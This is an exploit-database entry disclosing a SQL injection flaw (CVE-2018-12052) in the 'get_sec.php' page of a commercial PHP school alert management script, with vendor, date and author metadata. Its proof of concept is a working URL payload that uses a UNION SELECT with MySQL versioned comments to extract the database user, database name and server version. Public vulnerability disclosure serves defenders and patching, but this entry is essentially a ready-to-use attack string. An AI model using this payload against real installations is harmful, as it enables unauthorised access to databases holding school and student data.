# Exploit Title: Schools Alert Management Script - 'get_sec.php' SQL Injection # Date: 2018-06-07 # Vendor Homepage: https://www.phpscriptsmall.com/ # Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/ # Category: Web Application # Exploit Author: M3@Pandas # Web: https://github.com/unh3x/just4cve/issues/3 # Tested on: Linux Mint # CVE: CVE-2018-12052 # Proof of Concepti1/4 /get_sec.php?q=1'+/*!50000union*/+select+1,/*!50000concat*/(user(),0x7e7e,database(),0x7e7e,@@version)%23